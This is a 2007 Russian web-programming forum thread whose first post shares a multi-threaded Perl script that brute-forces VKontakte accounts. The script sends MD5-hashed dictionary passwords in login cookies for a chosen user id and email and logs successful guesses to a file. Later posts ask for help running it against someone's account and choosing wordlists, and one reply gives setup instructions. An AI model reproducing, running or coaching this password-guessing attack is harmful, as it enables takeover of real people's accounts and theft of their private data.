![]() |
|
Web-программирование PHP, Perl, JavaScript, HTML, CGI, ASP, MySQL, etc. |
|
Опции темы
![]() |
Оценить тему
![]() |
![]() |
#1 |
Участник
|
![]()
И так сегодня павел дуров закрыл багу в печенюшках которая позволяла логинится по кукам не зная мыла и следовательно перебирать пароли, но зная мыло всё же можно брутить юзера:fuck: и так мой финальный брутфорс для контакта, сделал многопоточность, у меня на 110кбит при 4 потоках перебирало около 50 000 паролей в час :)
Код:
#!/usr/bin/perl use IO::Socket; use MD5; use threads; use threads::shared; my @pass : shared; ###################################### # C!klodoL # vkontakte.ru bruteforce with multi-threads :) ###################################### $dic = 'passl.txt'; #словарь паролей $id = 111111; #id цели $mail = 'mail%40mail.com'; #мыло, вместо @ вписать %40 $threads = 4; #количество потоков ###################################### open (pass, "<$dic"); Next: @pass = pass(); for(0..$threads) {$trl[$_] = threads->create(\&Brut, $_);} for(@trl) { $_->join; } sub Brut { while (@pass){ $pass = shift @pass; $md5 = MD5->hexhash($pass); $sock = IO::Socket::INET->new(Proto=>'tcp',PeerAddr=>'vkontakte.ru',PeerPort=>80); print $sock "HEAD http://vkontakte.ru/ HTTP/1.0\r\n". "Host: vkontakte.ru\r\n". "Accept: */*\r\n". "Content-Type: application/x-www-form-urlencoded\r\n". "User-Agent: Mozillo\r\n". "Cookie: remixchk=2; remixmid=$id; remixemail=$mail; remixpass=$md5\r\n". "Connection: close\r\n\r\n"; $answ = <$sock>; close $sock; print "$pass $answ"; if ($answ =~ /302/){ open (good, '>>good.txt'); print good "$id:$pass:$md5\n"; print "$id:$pass:$md5\n"; close good; exit;} } } goto Next; sub pass { my (@mas); while (<pass>){ push @mas, $_; last if (@mas == 400); } chomp @mas; return @mas; } Последний раз редактировалось C!klodoL; 26.08.2007 в 09:10. |
![]() |
![]() |
#2 |
Участник
|
![]()
.....
Хочешь знать как работает ICQ? Читай документацию по протоколу в OSCAR. Последний раз редактировалось .fry; 04.11.2008 в 22:58. |
![]() |
![]() |
#4 | |
Участник
|
![]()
угу...тема
Цитата:
![]() |
![]() |
#5 | |
Участник
|
![]() Цитата:
Последний раз редактировалось C!klodoL; 18.08.2007 в 02:45. |
|
![]() |
![]() |
#6 |
Модератор
|
![]() |
![]() |
![]() |
#7 |
Участник
|
![]()
мне мне надо брутить контакт!
только объясните как юзать тот код который приведен пожалуйста! Добавлено через 17 минут и еще - у контакта есть какая то логика при раздаче паролей? если представить что человек не менял его на свой - но какой лучше словарь использовать?? спасибо Добавлено через 18 минут и еще - у контакта есть какая то логика при раздаче паролей? если представить что человек не менял его на свой - но какой лучше словарь использовать?? спасибо Добавлено через 19 минут хотел написать ТО какой лучше словарь использовать Последний раз редактировалось marco_tullio; 02.11.2007 в 04:05. Причина: Добавлено сообщение |
![]() |
![]() |
#8 | |
Участник
|
![]()
А он у меня чё-то не пашет говорит следующее:
Цитата:
|
|
![]() |
![]() |
#9 |
Участник
|
![]()
marco_tullio
качаем Perl c activestate.com, ставим, сохраняем код как brut.pl не забыв указать необходимые параметры в скрипте belchak у тебя перл старье, без поддержки потоков, скачай новый а вообще по моему там теперь ввели бан за частые запросы |
![]() |
![]() |
#10 |
Участник
|
![]()
вероянто, это тот самы случай, когда кривые руки голове покоя не дают, но, тем не менее, отважусь задать вопрос) значит, вписываю мыло, вписываю id, запускаю скрипт. В принципе, ошибок он не мне выдает, даже запускается. Решительно непонятно только делает ли он что-нибудь. Сетевой монитор с его стороны активности не замечает, хотя траффик, по идее, должен быть приличный. Мож я исходники плохо читал?..=\
|
![]() |
![]() |
#12 |
Почемучка
|
![]()
что ты этим хотел сказать?
просто пооффтопить или может съязвить? |
![]() |
![]() |
#14 |
Участник
|
![]()
Неблагородное это дело брутить такой сайт...
Павел Дуров для людей старается...даже рекламу на сайт не вешает...в общем ***** Вы! Извините уж, конечно, но это моё мнение!
#16 |
Участник
|
![]()
manny может фаерволл какой там блочит, может еще что, я то не телепат, а вообще ты какой то подозрительный =/ то скрипт запустить не можешь, а вдруг про дескрипторы знаешь
>Павел Дуров для людей старается ога, и миралабис для людей старается, давайте его не будем брутить, и гилл бейц стараеццо, давайте не будет п.. винду. а вообще я хз для кого павел старается, но то что фото и видео там сохраняются после их удаления это факт 8) Бесплатный сыр только в мышеловке, помним? 8) |
![]() |
![]() |
#18 |
Участник
|
![]()
точно?